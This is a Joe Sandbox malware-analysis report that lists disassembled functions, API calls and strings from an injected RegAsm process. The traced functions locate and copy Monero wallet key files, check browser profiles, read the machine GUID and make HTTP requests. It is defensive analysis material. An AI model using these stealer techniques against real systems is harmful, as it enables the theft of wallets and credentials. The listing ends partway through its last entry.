Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 00416985
ERROR, xrefs: 00416977
ERROR, xrefs: 0041696D
ERROR, xrefs: 00416914
ERROR, xrefs: 0041697E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: df153083d6535c7c34a5befce146155da6869fd2f995a743f7612deb0ce2170b
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: df153083d6535c7c34a5befce146155da6869fd2f995a743f7612deb0ce2170b
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040EB71
firefox, xrefs: 0040EE17
Stable\, xrefs: 0040ED5B

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

CopyFileA.KERNEL32(?,?,00000001,0043A99C,004369EF,\Monero\wallet.keys,004369EE), ref: 00401C2A

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 00401C9D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCreateHeaplstrlen$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 2771091047-3586502688
Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9

Strings

LzA, xrefs: 00415FC2

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID: LzA
API String ID: 1968765330-1388989900
Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
wallet_path, xrefs: 00401A9C

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

